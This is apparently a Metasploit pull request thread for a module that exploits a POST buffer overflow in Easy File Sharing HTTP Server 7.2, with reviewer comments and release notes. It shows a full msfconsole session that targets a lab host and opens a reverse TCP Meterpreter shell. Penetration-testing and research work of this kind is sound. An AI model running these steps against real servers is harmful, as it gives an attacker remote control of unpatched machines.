Easy File Sharing HTTP Server 7.2 - Post Overflow exploit

[Mzack9999]

This module exploits a post buffer overflow vulnerability of Easy File Sharing HTTP Server 7.2

Verification

Tested on: Windows XP Sp3 English
Vulnerable application: http://www.sharing-file.com/efssetup.exe

Example output:

marco@kali:~$ msfconsole -q
msf > use exploit/windows/http/easyfilesharing_post
msf exploit(easyfilesharing_post) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(easyfilesharing_post) > exploit
 
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Sending stage (957487 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1253) at 2017-06-17 22:45:34 +0200
 
meterpreter > sysinfo
Computer    	: MM-8B040C5B05D9
OS          	: Windows XP (Build 2600, Service Pack 3).
Architecture	: x86
System Language : en_US
Domain      	: WORKGROUP
Logged On Users : 2
Meterpreter 	: x86/windows
meterpreter > exit
[*] Shutting down Meterpreter...
 
[*] 192.168.56.101 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(easyfilesharing_post) >

[pbarry-r7]

Thanks for your PR, @Mzack9999. Would you mind adding some docs when you have a moment? Something like this: https://github.com/rapid7/metasploit-framework/pull/8577/files Thx.

[wwebb-r7]

Works fine. I'm going to go ahead and land it, but I'll take a look to see if there is anyway to minimize the amount of inc edx gadgets, if only for my own curiosity.

[wwebb-r7]

Release Notes

The exploits/windows/http/easyfilesharing_post module has been added to the framework. This module exploits a remote buffer overflow vulnerability in the Easy File Sharing HTTP Server 7.2.